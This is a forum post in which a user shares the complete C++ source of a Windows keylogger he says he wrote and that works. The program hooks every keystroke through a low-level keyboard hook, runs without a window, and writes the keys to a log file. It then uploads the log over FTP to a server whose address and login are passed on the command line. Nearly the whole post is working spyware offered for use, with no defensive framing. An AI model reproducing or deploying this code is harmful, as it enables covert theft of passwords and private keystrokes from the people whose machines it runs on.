Keylogger with FTP upload

Discussion in 'Chit Chat' started by skee83, Jul 21, 2016.

  1. skee83

    skee83 MDL Novice

    Jul 17, 2016
    5
    2
    0
    #1 skee83, Jul 21, 2016
    Last edited by a moderator: Apr 20, 2017
    Here's a keylogger i made a while back, It's not the best in the world but it works, Let me know what you think.

    Code:
    //compiler flags: -mwindows -lWininet
    //compiler flags for 64bit: -mwindows -lWininet -m64 -static-libgcc -static-libstdc++
    
    #include <windows.h>
    #include <wininet.h>
    #pragma comment(lib, "wininet")
    #include <fstream>
    #include <string.h>
    #include <stdio.h>
    #include <time.h>
    #include <stdlib.h>
    #include <signal.h>
    
    using namespace std;
    
    FILE *f;
    HHOOK _hook;
    KBDLLHOOKSTRUCT kbdStruct;
    
    int send(const char *ftp, const char *user, const char *pass, const char *pathondisk, const char *nameonftp)
    {
    
    HINTERNET hInternet;
    HINTERNET hFtpSession;
    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    if(hInternet==NULL)
    {
    return 0;
    }
    hFtpSession = InternetConnect(hInternet,
        (LPTSTR)ftp, INTERNET_DEFAULT_FTP_PORT,
        (LPTSTR)user, (LPTSTR)pass, INTERNET_SERVICE_FTP,
        INTERNET_FLAG_PASSIVE, 0);
    if(hFtpSession==NULL)
    {
    return 0;
    }
    Sleep(1000);
    if (!FtpPutFile(hFtpSession, (LPTSTR)pathondisk, (LPTSTR)nameonftp, FTP_TRANSFER_TYPE_ASCII, 0))
        {
    InternetCloseHandle(hFtpSession);
        InternetCloseHandle(hInternet);
    return 0;
    }
    Sleep(1000);
    InternetCloseHandle(hFtpSession);
    InternetCloseHandle(hInternet);
    return 0;
    }
    
    LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam)
    {
        if (nCode >= 0)
        {
            if (wParam == WM_KEYDOWN)
            {
                kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
    switch(kbdStruct.vkCode)
    {
    case VK_RETURN:
    fprintf(f,"%s","\n");
    fflush(f);
    break;
    case VK_BACK:
    fprintf(f,"%s","<");
    fflush(f);
    break;
    case VK_MENU:
    fprintf(f,"%s","[ALT]");
    fflush(f);
    break;
    case VK_CONTROL:
    fprintf(f,"%s","[CONTROL]");
    fflush(f);
    break;
    case VK_SHIFT:
    fprintf(f,"%s","[SHIFT]");
    fflush(f);
    break;
    case VK_LSHIFT:
    fprintf(f,"%s","[L_SHIFT]");
    fflush(f);
    break;
    case VK_RSHIFT:
    fprintf(f,"%s","[R_SHIFT]");
    fflush(f);
    break;
    case VK_CAPITAL:
    fprintf(f,"%s","[CAPS]");
    fflush(f);
        break;
    case VK_TAB:
    fprintf(f,"%s","[TAB]");
    fflush(f);
    break;
    case VK_SPACE:
    fprintf(f,"%s"," ");
    fflush(f);
    break;
    case 0x30:
    fprintf(f,"%s","0");
    fflush(f);
    break;
    case 0x31:
    fprintf(f,"%s","1");
    fflush(f);
    break;
    case 0x32:
    fprintf(f,"%s","2");
    fflush(f);
    break;
    case 0x33:
    fprintf(f,"%s","3");
    fflush(f);
    break;
    case 0x34:
    fprintf(f,"%s","4");
    fflush(f);
    break;
    case 0x35:
    fprintf(f,"%s","5");
    fflush(f);
    break;
    case 0x36:
    fprintf(f,"%s","6");
    fflush(f);
    break;
    case 0x37:
    fprintf(f,"%s","7");
    fflush(f);
    break;
    case 0x38:
    fprintf(f,"%s","8");
    fflush(f);
    break;
    case 0x39:
    fprintf(f,"%s","9");
    fflush(f);
    break;
    case 0x41:
    fprintf(f,"%s","a");
    fflush(f);
    break;
    case 0x42:
    fprintf(f,"%s","b");
    fflush(f);
    break;
    case 0x43:
    fprintf(f,"%s","c");
    fflush(f);
    break;
    case 0x44:
    fprintf(f,"%s","d");
    fflush(f);
    break;
    case 0x45:
    fprintf(f,"%s","e");
    fflush(f);
    break;
    case 0x46:
    fprintf(f,"%s","f");
    fflush(f);
    break;
    case 0x47:
    fprintf(f,"%s","g");
    fflush(f);
    break;
    case 0x48:
    fprintf(f,"%s","h");
    fflush(f);
    break;
    case 0x49:
    fprintf(f,"%s","i");
    fflush(f);
    break;
    case 0x4A:
    fprintf(f,"%s","j");
    fflush(f);
    break;
    case 0x4B:
    fprintf(f,"%s","k");
    fflush(f);
    break;
    case 0x4C:
    fprintf(f,"%s","l");
    fflush(f);
    break;
    case 0x4D:
    fprintf(f,"%s","m");
    fflush(f);
    break;
    case 0x4E:
    fprintf(f,"%s","n");
    fflush(f);
    break;
    case 0x4F:
    fprintf(f,"%s","o");
    fflush(f);
    break;
    case 0x50:
    fprintf(f,"%s","p");
    fflush(f);
    break;
    case 0x51:
    fprintf(f,"%s","q");
    fflush(f);
    break;
    case 0x52:
    fprintf(f,"%s","r");
    fflush(f);
    break;
    case 0x53:
    fprintf(f,"%s","s");
    fflush(f);
    break;
    case 0x54:
    fprintf(f,"%s","t");
    fflush(f);
    break;
    case 0x55:
    fprintf(f,"%s","u");
    fflush(f);
    break;
    case 0x56:
    fprintf(f,"%s","v");
    fflush(f);
    break;
    case 0x57:
    fprintf(f,"%s","w");
    fflush(f);
    break;
    case 0x58:
    fprintf(f,"%s","x");
    fflush(f);
    break;
    case 0x59:
    fprintf(f,"%s","y");
    fflush(f);
    break;
    case 0x5A:
    fprintf(f,"%s","z");
    fflush(f);
    break;
    //NUMPAD KEYS
    case VK_NUMPAD0:
    fprintf(f,"%s","0");
    fflush(f);
    break;
    case VK_NUMPAD1:
    fprintf(f,"%s","1");
    fflush(f);
    break;
    case VK_NUMPAD2:
    fprintf(f,"%s","2");
    fflush(f);
    break;
    case VK_NUMPAD3:
    fprintf(f,"%s","3");
    fflush(f);
    break;
    case VK_NUMPAD4:
    fprintf(f,"%s","4");
    fflush(f);
    break;
    case VK_NUMPAD5:
    fprintf(f,"%s","5");
    fflush(f);
    break;
    case VK_NUMPAD6:
    fprintf(f,"%s","6");
    fflush(f);
    break;
    case VK_NUMPAD7:
    fprintf(f,"%s","7");
    fflush(f);
    break;
    case VK_NUMPAD8:
    fprintf(f,"%s","8");
    fflush(f);
    break;
    case VK_NUMPAD9:
    fprintf(f,"%s","9");
    fflush(f);
    break;
    case VK_MULTIPLY:
    fprintf(f,"%s","*");
    fflush(f);
    break;
    case VK_ADD:
    fprintf(f,"%s","+");
    fflush(f);
    break;
    case VK_SUBTRACT:
    fprintf(f,"%s","-");
    fflush(f);
    break;
    case VK_DECIMAL:
    fprintf(f,"%s",".");
    fflush(f);
    break;
    case VK_DIVIDE:
    fprintf(f,"%s","/");
    fflush(f);
    break;
    case VK_NUMLOCK:
    fprintf(f,"%s","[NUMLOCK]");
    fflush(f);
    break;
    case VK_SCROLL:
    fprintf(f,"%s","[SCROLL_LOCK]");
    fflush(f);
    break;
    //MISC KEYS
    case VK_DELETE:
    fprintf(f,"%s","[DEL]");
    fflush(f);
    break;
    case VK_ESCAPE:
    fprintf(f,"%s","[ESC]");
    fflush(f);
    break;
    //OEM SPECIFIC KEYS
    case 0xBD:
    fprintf(f,"%s","-or_");
    fflush(f);
    break;
    case 0xBE:
    fprintf(f,"%s",".");
    fflush(f);
    break;
    case 0xBB:
    fprintf(f,"%s","+or=");
    fflush(f);
    break;
    }
                
            }
        }
        return CallNextHookEx(_hook, nCode, wParam, lParam);
    }
    
    void signal_callback_handler(int signum)
    {
    exit(signum);
    }
    
    int main(int argc, char *argv[])
    {
    if (argc != 4)
    {
    return -1;
    }
    signal(SIGINT, signal_callback_handler);
        Sleep(20000);//sleep 20 seconds
    char fileName[9];
        char ext[4] = "txt";
        char name[L_tmpnam];
        strcpy(fileName, tmpnam(name));
        strcat(fileName, ext);
        string str1 = fileName;
        str1.erase(0, 1);
        const char* logFile = str1.c_str();
    send(argv[1],argv[2],argv[3],"log.txt",logFile);
    f = fopen("log.txt","w");
    Sleep(200);
    fclose(f);
    remove("log.txt");
    f = fopen("log.txt","w");
    time_t rawtime;
        struct tm *timeinfo;
        time (&rawtime);
        timeinfo = localtime (&rawtime);
    fprintf(f,"%s",asctime(timeinfo));
    if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0)))
        {
    fclose(f);
            return -1;
        }
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
    
    }
    UnhookWindowsHookEx(_hook);
    fclose(f);
    return 0;
    }